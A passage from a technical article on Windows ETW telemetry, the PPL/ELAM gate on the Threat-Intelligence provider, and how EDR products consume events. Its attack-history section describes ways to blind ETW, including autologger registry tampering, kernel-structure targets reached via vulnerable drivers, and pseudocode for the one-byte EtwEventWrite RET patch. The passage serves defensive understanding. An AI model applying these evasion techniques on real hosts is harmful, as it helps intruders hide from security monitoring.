&lt;td&gt;&lt;code&gt;{2A576B87-09A7-520E-C21A-4942F0271D67}&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Post-deobfuscation script content&lt;/td&gt;
&lt;td&gt;None (admin)&lt;/td&gt;
&lt;td&gt;[@ms-amsi-portal], [@palantir-tampering-wayback]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Microsoft-Windows-PowerShell&lt;/td&gt;
&lt;td&gt;&lt;code&gt;{a0c1853b-5c40-4b15-8766-3cf1c58f985a}&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Script-block logging (4104), pipeline&lt;/td&gt;
&lt;td&gt;None (admin)&lt;/td&gt;
&lt;td&gt;[@gh-jdu2600]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Microsoft-Windows-DotNETRuntime&lt;/td&gt;
&lt;td&gt;&lt;code&gt;{e13c0d23-ccbc-4e12-931b-d9cc2eee27e4}&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;CLR assembly load, JIT, exceptions&lt;/td&gt;
&lt;td&gt;None (admin)&lt;/td&gt;
&lt;td&gt;[@xpn-hiding-dotnet]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Microsoft-Windows-Sysmon&lt;/td&gt;
&lt;td&gt;&lt;code&gt;{5770385F-C22A-43E0-BF4C-06F5698FFBD9}&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Sysmon driver re-publication&lt;/td&gt;
&lt;td&gt;None (admin)&lt;/td&gt;
&lt;td&gt;[@gh-jdu2600], [@ms-sysmon]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Microsoft-Windows-Threat-Intelligence&lt;/td&gt;
&lt;td&gt;&lt;code&gt;{f4e1897c-bb5d-5668-f1d8-040f4d8dd344}&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Memory-modifying syscalls (kernel-emitted)&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;PPL + ELAM (Antimalware signer level)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;[@fluxsec-eti], [@elastic-doubling-down]&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;

This is the *security* catalogue. The full Windows manifest-based provider list is roughly 1,300 entries on a current Windows 11 build; performance-tuning, diagnostic, and developer-facing providers fill out the rest. The jdu2600 inventory [@gh-jdu2600] [@gh-jdu2600] tracks the full list across Win10 versions; the repnz archive [@gh-repnz] [@gh-repnz] preserves byte-stable manifest copies for cross-version diffing.
&lt;p&gt;Nine of the ten rows in that table are accessible to any SYSTEM-privileged user-mode service. The tenth -- EtwTi -- requires a passport. The next section is about who issues the passport.&lt;/p&gt;
&lt;h2&gt;9. The PPL / ELAM gate: why EtwTi is not for everyone&lt;/h2&gt;
&lt;p&gt;To consume the one ETW provider that fires from the kernel for memory-modifying syscalls, your service must be (a) a Protected Process Light [@paragmali-com-app-ide], (b) signed at the Antimalware signer level with EKU &lt;code&gt;1.3.6.1.4.1.311.61.4.1&lt;/code&gt;, and (c) loaded from disk by an Early Launch Antimalware [@paragmali-com-to-userini] driver registered at boot. Two of those three were not possible for third parties until the Windows 10 RS-era.&lt;/p&gt;
&lt;p&gt;fluxsec.red [@fluxsec-eti] [@fluxsec-eti] gives the prerequisite list verbatim:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&quot;In order to start receiving ETW:TI signals, we need: 1. A service running as Protected Process Light, 2. An Early Launch Antimalware driver and certificate, 3. A logging mechanism.&quot; -- [@fluxsec-eti]&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Each prerequisite has a story.&lt;/p&gt;
&lt;h3&gt;Protected Process Light at the Antimalware signer level&lt;/h3&gt;
&lt;p&gt;Windows 8.1 introduced the &lt;em&gt;protected service&lt;/em&gt; concept specifically for antimalware engines. The motivation was simple: a malicious process running as administrator should not be able to inject code into the antimalware service or attach a debugger to it. The Microsoft Learn primary [@ms-protect-am] [@ms-protect-am] sets out the model:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&quot;Windows 8.1 introduced a new concept of protected services to protect anti-malware services... In addition to the existing ELAM driver certification requirements, the driver must have an embedded resource section containing the information of the certificates used to sign the user mode service binaries.&quot; -- [@ms-protect-am]&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;PPL is a process-protection level. A given process has a level on the PPL lattice; another process can open it for write or debug only if the requesting process&apos;s level is greater than or equal to the target&apos;s. Antimalware-PPL is a &lt;em&gt;signer level&lt;/em&gt; on that lattice. The kernel admits a process to Antimalware-PPL when its image is signed with a certificate whose EKU includes &lt;code&gt;1.3.6.1.4.1.311.61.4.1&lt;/code&gt; (Windows Antimalware) &lt;em&gt;and&lt;/em&gt; whose certificate is enrolled in an ELAM driver&apos;s allow-list at boot.&lt;/p&gt;

A Windows process-protection model. Each process has a PPL level; another process may open it for write or debug only if the requestor is at an equal or higher level. Originally introduced for DRM, the lattice was extended in Windows 8.1 to host the Antimalware signer level for protecting antimalware services from administrative-rights attackers.

A specific signer level on the PPL lattice. Reserved in Windows 8.1 for Microsoft Defender; opened to third-party EDR vendors via ELAM onboarding in the Windows 10 RS-era. Consumption of the `Microsoft-Windows-Threat-Intelligence` ETW provider is gated at the Antimalware signer level: an `EnableTraceEx2` call from a non-Antimalware-PPL caller against the EtwTi GUID returns `ERROR_ACCESS_DENIED` (the `EnableTraceEx2` [@ms-enabletraceex2] [@ms-enabletraceex2] page documents the error code for callers that lack the documented administrative groups; the per-provider PPL-signer-level check that triggers it for the EtwTi GUID specifically is described in the [@fluxsec-eti] prerequisite list).
&lt;h3&gt;Early Launch Antimalware&lt;/h3&gt;
&lt;p&gt;ELAM is a driver class that loads before any other non-Microsoft boot driver. The Microsoft Learn primary [@ms-elam] [@ms-elam] describes it:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&quot;Because an ELAM service runs as a PPL (Protected Process Light), you need to debug using a kernel debugger... AM drivers are initialized first and allowed to control the initialization of subsequent boot drivers, potentially not initializing unknown boot drivers.&quot; -- [@ms-elam]&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The boot sequence runs like this. Winload loads the ELAM driver as part of the early-boot path. The ELAM driver registers a callback via &lt;code&gt;IoRegisterBootDriverCallback&lt;/code&gt; and gets to inspect each subsequent boot driver, returning a verdict (initialize / do not initialize / unknown) based on the certificate inventory it carries in its embedded resource section. The kernel honours that verdict. After boot drivers settle, the SCM launches the paired user-mode antimalware service with the &lt;code&gt;LaunchProtected = SERVICE_LAUNCH_PROTECTED_ANTIMALWARE_LIGHT&lt;/code&gt; flag, and the kernel admits that service to Antimalware-PPL because its signing certificate matches an entry in the ELAM driver&apos;s allow-list.&lt;/p&gt;

A driver class that loads before any non-Microsoft boot driver. The ELAM driver registers a boot-driver callback to inspect subsequent drivers and an embedded-resource certificate inventory of permitted user-mode antimalware service signatures. Together with PPL, ELAM gates which user-mode antimalware services can pass the Antimalware-PPL admission check.
&lt;h3&gt;The 1709 onboarding&lt;/h3&gt;
&lt;p&gt;Microsoft Defender&apos;s &lt;code&gt;MsMpEng.exe&lt;/code&gt; ran at the Antimalware signer level by default starting around the Windows 10 1709 timeframe (October 17, 2017), and the same release is widely cited in EDR-vendor documentation as the moment the Antimalware-PPL onboarding was extended to third-party EDR vendors. The Microsoft primary that pins the 1709 third-party onboarding date is not in the public ETW documentation; we treat the date as widely-cited rather than verified.&lt;/p&gt;
&lt;p&gt;The dispositive practical evidence is the Trail of Bits 2023 walkthrough by Yarden Shafir [@trailofbits-shafir] [@trailofbits-shafir]. Shafir&apos;s WinDbg JS scripts walk the live &lt;code&gt;_ETW_REALTIME_CONSUMER&lt;/code&gt; data structures of a running Windows host and print:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&quot;Process CSFalconService.exe with ID 0x1e54 has handle 0x760 to Logger ID 3&quot; -- [@trailofbits-shafir]&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;That is CrowdStrike&apos;s user-mode service, holding a real-time consumer handle to an EtwTi logger session. By 2023 the third-party Antimalware-PPL story is operationally complete.&lt;/p&gt;

sequenceDiagram
    participant BL as Winload (boot)
    participant EL as ELAM Driver
    participant SCM as Service Control Manager
    participant SVC as EDR Service
    participant K as Kernel ETW
    BL-&amp;gt;&amp;gt;EL: Load ELAM driver (early boot)
    EL-&amp;gt;&amp;gt;EL: Register IoRegisterBootDriverCallback then read embedded cert inventory
    Note over EL: ELAM gates subsequent boot drivers
    SCM-&amp;gt;&amp;gt;SVC: Start EDR service with PROTECTED_ANTIMALWARE_LIGHT flag
    K-&amp;gt;&amp;gt;SVC: Verify signature against ELAM allow-list
    K--&amp;gt;&amp;gt;SVC: Admit to Antimalware-PPL
    SVC-&amp;gt;&amp;gt;K: EnableTraceEx2(session, EtwTi GUID, ...)
    K-&amp;gt;&amp;gt;K: Check caller signer level ge Antimalware
    K--&amp;gt;&amp;gt;SVC: SUCCESS
    Note over SVC,K: Non-PPL caller would receive ERROR_ACCESS_DENIED here
&lt;h3&gt;Why this gate matters for the section 1 hook&lt;/h3&gt;
&lt;p&gt;The asymmetry that defines the entire generation is one sentence in the fluxsec.red walkthrough [@fluxsec-eti] [@fluxsec-eti]:&lt;/p&gt;

We cannot patch out the Threat Intelligence provider as this is emitted from within the kernel itself. To do so, you&apos;d require kernelmode execution and then to patch out those signals so no ETW signals are emitted. -- [@fluxsec-eti]
&lt;p&gt;That is the answer to the puzzle the section 1 hook posed. The Adam Chester 2020 patch operates on a user-mode trampoline in the calling process. &lt;code&gt;ntdll!EtwEventWrite&lt;/code&gt; is a stub that calls down through &lt;code&gt;NtTraceEvent&lt;/code&gt; into the kernel; rewriting its first byte to &lt;code&gt;0xC3&lt;/code&gt; short-circuits the user-mode entry path and the calling process emits no events through that stub. But EtwTi does not fire from the user-mode entry path. EtwTi fires from inside the kernel implementation of &lt;code&gt;NtAllocateVirtualMemory&lt;/code&gt; and friends, after the syscall has crossed the boundary, on a path the user-mode patcher cannot reach without first achieving kernel execution.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; EtwTi is the only ETW provider in the catalogue whose producer fires from the kernel side of the syscall path -- and that is exactly why a user-mode patch in the calling process cannot silence it. The PPL+ELAM gate that controls &lt;em&gt;consumer&lt;/em&gt; admission is paired with a &lt;em&gt;producer&lt;/em&gt; location that no in-process attacker can reach.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The 2017 PPL+ELAM gate was a deliberate structural defense against the patch class that was only fully publicised three years later. By the time Chester wrote his March 2020 post, the load-bearing security signal was already structurally out of reach of his technique.&lt;/p&gt;

The combination of PPL and ELAM is not an arbitrary defense-in-depth stack. PPL gates *consumer identity* at signer level: only a binary signed with the Antimalware EKU and enrolled in an ELAM allow-list can subscribe. ELAM gates *load order*: the gate is set during early boot, before any code an attacker could load gets a chance to interfere. The signer-level check is hard because forging the signature requires breaking Microsoft&apos;s PKI; the load-order check is hard because subverting it requires compromising the boot path, which Secure Boot and the Vulnerable Driver Blocklist exist to defend.
&lt;p&gt;That is the gate. Now we walk the consumers that pass through it.&lt;/p&gt;
&lt;h2&gt;10. Six vendors, three spectra: a map of the EDR consumer architecture&lt;/h2&gt;
&lt;p&gt;Defender, CrowdStrike, SentinelOne, Sysmon, Wazuh, Elastic Defend. They look interchangeable on a vendor comparison sheet. They are not, and the differences are entirely about which substrates each one consumes.&lt;/p&gt;
&lt;p&gt;There are three axes that distinguish them.&lt;/p&gt;
&lt;h3&gt;Axis 1: kernel callbacks vs ETW&lt;/h3&gt;
&lt;p&gt;Some EDRs consume process-creation events through ETW (subscribing to &lt;code&gt;Microsoft-Windows-Kernel-Process&lt;/code&gt; from a SYSTEM-privileged user-mode service). Others register kernel callbacks directly through &lt;code&gt;PsSetCreateProcessNotifyRoutineEx&lt;/code&gt; [@ms-pssetprocnotify] [@ms-pssetprocnotify] and &lt;code&gt;PsSetCreateThreadNotifyRoutine&lt;/code&gt; [@ms-pssetthreadnotify] [@ms-pssetthreadnotify] from a kernel driver they ship.&lt;/p&gt;
&lt;p&gt;The trade-off is sharp. Kernel callbacks are synchronous: the kernel calls into the driver before the operation completes, the driver runs at PASSIVE_LEVEL in the originating thread context with normal kernel APCs disabled, and the driver can deny the operation by writing a non-success status to &lt;code&gt;CreationStatus&lt;/code&gt;. ETW is asynchronous: the event is emitted from the producer&apos;s hot path, drained from a per-CPU buffer by the writer thread, and delivered to the consumer&apos;s callback at some later point. ETW cannot deny anything; it can only observe.&lt;/p&gt;

The `PsSetCreate*NotifyRoutine` family of kernel APIs. A driver calls `PsSetCreateProcessNotifyRoutineEx` (process create/exit), `PsSetCreateThreadNotifyRoutine` (thread create/exit), or `PsSetLoadImageNotifyRoutine` (image load) at boot to register a callback. The kernel invokes the callback synchronously, in the originating thread context at PASSIVE_LEVEL with normal kernel APCs disabled. The `Ex` variant of the process callback receives a `CreationStatus` field the driver can write to deny the operation.
&lt;p&gt;CrowdStrike, SentinelOne, Sysmon, and Elastic Defend ship kernel drivers and use callbacks for the latency-critical hot path. Defender uses both -- callbacks from &lt;code&gt;WdFilter.sys&lt;/code&gt; and ETW consumption from &lt;code&gt;MsMpEng.exe&lt;/code&gt; -- because as the in-box engine it has the institutional position to do so. Wazuh ships no kernel driver; it consumes ETW exclusively via SilkETW-class wrappers, which makes it less invasive but unable to deny.&lt;/p&gt;
&lt;h3&gt;Axis 2: PPL adoption&lt;/h3&gt;
&lt;p&gt;Defender (&lt;code&gt;MsMpEng.exe&lt;/code&gt; and &lt;code&gt;MsMpEngCP.exe&lt;/code&gt;) runs at Antimalware-PPL by default. CrowdStrike&apos;s &lt;code&gt;CSFalconService.exe&lt;/code&gt; runs at Antimalware-PPL, demonstrably [@trailofbits-shafir] [@trailofbits-shafir]. SentinelOne&apos;s &lt;code&gt;SentinelAgent.exe&lt;/code&gt; is widely reported to run at Antimalware-PPL via vendor documentation, although it does not appear in the Trail of Bits sample debugger output. Sysmon runs as a &lt;em&gt;protected process&lt;/em&gt; but not at the Antimalware signer level [@ms-sysmon] [@ms-sysmon] -- the Microsoft Learn page states &quot;The service runs as a protected process, thus disallowing a wide range of user mode interactions&quot; without naming Antimalware specifically.&lt;/p&gt;
&lt;p&gt;Wazuh and Elastic Defend&apos;s user-mode services run as standard SYSTEM-privileged services without PPL.&lt;/p&gt;
&lt;h3&gt;Axis 3: EtwTi consumption&lt;/h3&gt;
&lt;p&gt;This axis is determined by axis 2. Defender consumes EtwTi by design -- it is the in-box reason EtwTi exists. CrowdStrike and SentinelOne consume EtwTi (the Trail of Bits debugger output is the practical demonstration). Sysmon does not consume EtwTi: it is not Antimalware-PPL, so its &lt;code&gt;EnableTraceEx2&lt;/code&gt; calls against the EtwTi GUID would receive &lt;code&gt;ERROR_ACCESS_DENIED&lt;/code&gt;. Sysmon relies on its own &lt;code&gt;SysmonDrv.sys&lt;/code&gt; callbacks for the in-memory threat surface that EtwTi covers for the others. Wazuh and Elastic Defend do not consume EtwTi for the same reason; Elastic Defend ships its own kernel driver to compensate [@elastic-doubling-down] [@elastic-doubling-down], using Microsoft-blessed kernel-callback paths for memory events.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Vendor&lt;/th&gt;
&lt;th&gt;Process surface&lt;/th&gt;
&lt;th&gt;PPL level&lt;/th&gt;
&lt;th&gt;EtwTi?&lt;/th&gt;
&lt;th&gt;Primary source&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Microsoft Defender&lt;/td&gt;
&lt;td&gt;Driver callbacks (&lt;code&gt;WdFilter.sys&lt;/code&gt;) + ETW (&lt;code&gt;MsMpEng.exe&lt;/code&gt;)&lt;/td&gt;
&lt;td&gt;Antimalware-PPL&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;[@ms-protect-am]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CrowdStrike Falcon&lt;/td&gt;
&lt;td&gt;Driver callbacks + ETW&lt;/td&gt;
&lt;td&gt;Antimalware-PPL&lt;/td&gt;
&lt;td&gt;Yes ([@trailofbits-shafir] live evidence)&lt;/td&gt;
&lt;td&gt;[@trailofbits-shafir]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SentinelOne&lt;/td&gt;
&lt;td&gt;Driver callbacks + ETW&lt;/td&gt;
&lt;td&gt;Antimalware-PPL&lt;/td&gt;
&lt;td&gt;Widely reported&lt;/td&gt;
&lt;td&gt;-- (vendor docs; SentinelAgent.exe not in [@trailofbits-shafir] sample)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Sysmon&lt;/td&gt;
&lt;td&gt;&lt;code&gt;SysmonDrv.sys&lt;/code&gt; callbacks; publishes via own ETW provider&lt;/td&gt;
&lt;td&gt;Protected (not Antimalware)&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;[@ms-sysmon]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Wazuh&lt;/td&gt;
&lt;td&gt;ETW only (SilkETW-class)&lt;/td&gt;
&lt;td&gt;Standard SYSTEM&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Elastic Defend&lt;/td&gt;
&lt;td&gt;Own kernel driver + ETW&lt;/td&gt;
&lt;td&gt;Standard SYSTEM&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;[@elastic-doubling-down]&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Sysmon is worth singling out as the canonical &lt;em&gt;callback-then-publish&lt;/em&gt; reference architecture. Its kernel driver registers &lt;code&gt;PsSetCreate*NotifyRoutine&lt;/code&gt; callbacks; its user-mode service consumes the events the driver delivers; and the service then publishes them via its own &lt;code&gt;Microsoft-Windows-Sysmon&lt;/code&gt; ETW provider for any downstream consumer (a SIEM forwarder, a SOC dashboard, a custom analytic) to read. The result is that Sysmon&apos;s events are universally consumable -- which is why Wazuh and Splunk both ship Sysmon configurations as their default kernel-event source.&lt;/p&gt;

Sysmon&apos;s design choice is the reference architecture for the callback-then-publish pattern, even though Sysmon is not itself an Antimalware-PPL EDR. By publishing through its own ETW provider rather than writing to a private channel, Sysmon makes its events consumable by any downstream pipeline. Wazuh and the Splunk Universal Forwarder can both ingest Sysmon events without any custom integration work. This is why Sysmon, despite being free, is the de facto kernel-event source for the open-source SIEM world.

flowchart LR
    K[Kernel callbacks&lt;br /&gt;synchronous, can deny] --- L1[Sysmon driver]
    K --- L2[CrowdStrike driver]
    K --- L3[SentinelOne driver]
    K --- L4[Elastic driver]
    K --- L5[Defender WdFilter.sys]
    M[ETW providers&lt;br /&gt;asynchronous, observe-only&lt;br /&gt;up to 8 consumers per provider] --- M1[Defender MsMpEng]
    M --- M2[CrowdStrike service]
    M --- M3[SentinelOne service]
    M --- M4[Sysmon service]
    M --- M5[Wazuh ETW reader]
    M --- M6[Elastic Defend service]
    K -.latency-vs-coupling axis.-&amp;gt; M
&lt;p&gt;The CrowdStrike July 2024 channel-file outage was a kernel-driver brittleness story, not an ETW story. The Falcon kernel driver&apos;s content-update parser dereferenced an out-of-bounds pointer when processing a channel file whose Rapid Response Content template had 21 input fields while the sensor&apos;s Content Interpreter expected only 20, triggering an out-of-bounds array read, BSOD-ing roughly 8.5 million Windows hosts [@ms-crowdstrike-2024][@crowdstrike-rca-2024]. That story belongs to the App Identity in Windows article [@paragmali-com-app-ide] in this series; it is mentioned here only to mark that the cost of the synchronous-kernel-driver path is a higher blast radius when the driver itself is buggy.&lt;/p&gt;
&lt;p&gt;A note on Defender&apos;s cloud schema. The events that surface in Microsoft Defender for Endpoint&apos;s hunting tables -- &lt;code&gt;DeviceProcessEvents&lt;/code&gt;, &lt;code&gt;DeviceFileEvents&lt;/code&gt;, &lt;code&gt;DeviceNetworkEvents&lt;/code&gt;, &lt;code&gt;DeviceImageLoadEvents&lt;/code&gt;, &lt;code&gt;DeviceRegistryEvents&lt;/code&gt; -- are the cloud-side abstraction over the kernel and ETW telemetry the Defender sensor collects locally. The full schema mapping from ETW provider to cloud column is out of scope here, but the substrate is the same.&lt;/p&gt;
&lt;p&gt;Six vendors, three axes, one substrate. Now we walk the attack tradition that the substrate has to survive.&lt;/p&gt;
&lt;h2&gt;11. The attack tradition: five generations of trying to blind ETW&lt;/h2&gt;
&lt;p&gt;Every generation of ETW has been attacked. Some attacks broke a single provider; some broke every user-mode provider on a host; one would, if it worked at scale, break Defender. The defense story is on the same five-generation timeline.&lt;/p&gt;
&lt;h3&gt;Gen 1 (2014-2018): autologger registry tampering&lt;/h3&gt;
&lt;p&gt;The dispositive taxonomy is Matt Graeber&apos;s December 24, 2018 Palantir CIRT post [@palantir-tampering-wayback] [@palantir-tampering-wayback], preserved in the Wayback Machine because the direct Medium URL has since returned HTTP 403 to non-browser fetchers. The opening framing is verbatim:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&quot;Event Tracing for Windows (ETW) is the mechanism Windows uses to trace and log system events. Attackers often clear event logs to cover their tracks. Though the act of clearing an event log itself generates an event, attackers who know ETW well may take advantage of tampering opportunities to cease the flow of logging temporarily or even permanently, without generating any event log entries in the process.&quot; -- [@palantir-tampering-wayback]&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Graeber and Christensen split the technique into two classes. &lt;em&gt;Persistent tampering&lt;/em&gt; writes to the autologger registry path described in section 6, disabling a session before it ever starts at next boot; the events of interest are never captured because the session is never running. &lt;em&gt;Ephemeral tampering&lt;/em&gt; targets a live session: stopping the session via &lt;code&gt;ControlTrace&lt;/code&gt;, removing a provider from a session via &lt;code&gt;EnableTraceEx2(EVENT_CONTROL_CODE_DISABLE_PROVIDER, ...)&lt;/code&gt;, or directly clearing the session&apos;s buffers.&lt;/p&gt;
&lt;p&gt;The defense is direct: monitor the autologger registry surface. Sysmon Event ID 13 [@ms-sysmon] surfaces registry value-set events in &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\&lt;/code&gt;; a SOC playbook that alerts on any unexpected write to that subtree catches the persistent class of attack reliably. Matt Graeber&apos;s authorship is cross-confirmed by the palantir/exploitguard repository [@gh-palantir-exploitguard] [@gh-palantir-exploitguard], which credits him as the lead researcher on the ETW work.&lt;/p&gt;
&lt;h3&gt;Gen 2 (2020): user-mode &lt;code&gt;EtwEventWrite&lt;/code&gt; 0xC3 RET patch&lt;/h3&gt;
&lt;p&gt;The technique that made ETW patching a household tradecraft term is Adam Chester&apos;s &quot;Hiding your .NET - ETW&quot;, March 17, 2020 [@xpn-hiding-dotnet] [@xpn-hiding-dotnet]. The mechanic is one byte:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Locate &lt;code&gt;ntdll!EtwEventWrite&lt;/code&gt; (or in modern variants &lt;code&gt;ntdll!NtTraceEvent&lt;/code&gt;) in the calling process&apos;s memory.&lt;/li&gt;
&lt;li&gt;Use &lt;code&gt;VirtualProtect&lt;/code&gt; to make the page writable.&lt;/li&gt;
&lt;li&gt;Write the byte &lt;code&gt;0xC3&lt;/code&gt; over the function&apos;s first byte.&lt;/li&gt;
&lt;li&gt;Restore the page protection.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;code&gt;0xC3&lt;/code&gt; is the near-return opcode [@felixcloutier-ret] [@felixcloutier-ret]: &quot;C3 RET ZO Valid Valid Near return to calling procedure.&quot; Any caller into the function falls straight back to its return address before producing a single event. The calling process now silently fails to emit any user-mode ETW events for any provider that funnels through the patched stub -- including &lt;code&gt;Microsoft-Windows-DotNETRuntime&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;The technique has been re-implemented in every language that can call &lt;code&gt;VirtualProtect&lt;/code&gt;. The fluxsec.red Rust port [@fluxsec-etw-patching] [@fluxsec-etw-patching] explains the modern variant verbatim:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&quot;When a ETW Provider sends a notification, it will eventually reach into ntdll.dll for the function NtTraceEvent... we can simply patch the function address to return straight from byte 0. The opcode for a ret is C3, so we can swap out the opcode 4C with C3 to immediately return out of the stub.&quot; -- [@fluxsec-etw-patching]&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Here is the structure of the patch in TypeScript pseudocode -- not actually runnable Win32, but mirroring exactly what a Windows binary would do:&lt;/p&gt;
&lt;p&gt;{`
// Pseudocode: silence user-mode ETW for the calling process.
// This silences only the calling process and only user-mode providers
// that funnel through the patched stub.&lt;/p&gt;
&lt;p&gt;// 1. Resolve the address of ntdll!EtwEventWrite in this process.
const ntdll = getModuleHandle(&quot;ntdll.dll&quot;);
const fn = getProcAddress(ntdll, &quot;EtwEventWrite&quot;);&lt;/p&gt;
&lt;p&gt;// 2. Make the function&apos;s first page writable.
const PAGE_EXECUTE_READWRITE = 0x40;
let oldProtect = 0;
virtualProtect(fn, 1, PAGE_EXECUTE_READWRITE, /* out */ ref(oldProtect));&lt;/p&gt;
&lt;p&gt;// 3. Write 0xC3 (RET) over the first byte. Caller now returns immediately.
writeByte(fn, 0xC3);&lt;/p&gt;
&lt;p&gt;// 4. Restore original page protection.
virtualProtect(fn, 1, oldProtect, /* out */ ref(oldProtect));&lt;/p&gt;
&lt;p&gt;// Limits:
// - Silences only this process.
// - Silences only providers whose emit path funnels through this stub.
// - Cannot silence kernel-emitted providers like Microsoft-Windows-Threat-Intelligence.
`}&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The patch operates on the calling process&apos;s user-mode trampoline. Other processes on the host are unaffected; their ETW emissions continue normally. Kernel-emitted providers like &lt;code&gt;Microsoft-Windows-Threat-Intelligence&lt;/code&gt; are unaffected even in the patched process; they fire from the kernel side of the syscall path, after control has crossed the user/kernel boundary, on a code path the user-mode patcher cannot reach without first achieving kernel execution.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;Gen 3 (2021-2023): kernel-mode primitives&lt;/h3&gt;
&lt;p&gt;If a user-mode patch cannot reach EtwTi, can a kernel-mode patch? Yes -- but the attacker first needs kernel execution. The most common path is BYOVD [@paragmali-com-in-windows]: load a signed but vulnerable driver and use its primitive to read or write kernel memory. Once you can write kernel memory you can target ETW&apos;s internal data structures directly.&lt;/p&gt;
&lt;p&gt;Binarly&apos;s Black Hat Europe 2021 talk [@binarly-edr] [@binarly-edr] documents the surface verbatim:&lt;/p&gt;

Many ways to disable ETW logging are publicly available from passing a TRUE boolean parameter into a `nt!EtwpStopTrace` function to finding an ETW specific structure and dynamically modifying it or patching `ntdll!ETWEventWrite` or `advapi32!EventWrite` to return immediately thus stopping the user-mode loggers. -- [@binarly-edr]
&lt;p&gt;The kernel-side primitives Binarly enumerates target the &lt;code&gt;_ETW_GUID_ENTRY&lt;/code&gt; structure for a provider, the &lt;code&gt;EtwpRegistration&lt;/code&gt; linked list of registered providers, and the &lt;code&gt;EtwpEventTracingProhibited&lt;/code&gt; flag the kernel checks before emitting events. Yarden Shafir&apos;s 2023 Trail of Bits walkthrough [@trailofbits-shafir] [@trailofbits-shafir] provides the contemporary kernel-side data structure walk through &lt;code&gt;_ETW_REALTIME_CONSUMER&lt;/code&gt; and &lt;code&gt;_ETW_SILODRIVERSTATE&lt;/code&gt;, and notes:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&quot;Most recently, the Lazarus Group bypassed EDR detection by disabling ETW providers&quot; -- [@trailofbits-shafir]&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The architectural-level treatment is well-documented; the specific kernel offsets that change between Windows builds are a moving target. We treat the technique class as well-established and the per-build offset details as out of scope.&lt;/p&gt;
&lt;h3&gt;Defense Gen 1 (2017): Antimalware-PPL + ELAM gate on EtwTi&lt;/h3&gt;
&lt;p&gt;Section 9 covered this in detail. The point to record here, in the attack-tradition timeline, is that the Antimalware-PPL gate predates the Adam Chester 2020 user-mode patch by three years. Microsoft did not respond to Chester&apos;s post; they had already put the load-bearing security signal structurally out of reach of any user-mode patch in the calling process. The user-mode patch class is generic against &lt;code&gt;Microsoft-Windows-DotNETRuntime&lt;/code&gt; and the rest of the user-mode catalogue; it is structurally impotent against &lt;code&gt;Microsoft-Windows-Threat-Intelligence&lt;/code&gt;.&lt;/p&gt;
&lt;h3&gt;Defense Gen 2 (2022): Vulnerable Driver Blocklist on by default&lt;/h3&gt;
&lt;p&gt;The kernel-mode primitive class needs a kernel write. Without a vulnerability in the EDR&apos;s kernel driver, the realistic path is BYOVD: load a third-party signed driver that exposes a memory-write primitive. The structural defense is Microsoft&apos;s Vulnerable Driver Blocklist [@ms-vdb] [@ms-vdb]:&lt;/p&gt;

Since the Windows 11 2022 update, the vulnerable driver blocklist is enabled by default for all devices, and can be turned on or off via the Windows Security app... the vulnerable driver blocklist is also enforced when either memory integrity, also known as hypervisor-protected code integrity (HVCI), Smart App Control, or S mode is active... The blocklist is updated quarterly. In addition, blocklist updates are delivered through the monthly Windows updates as part of the standard servicing process. -- [@ms-vdb]
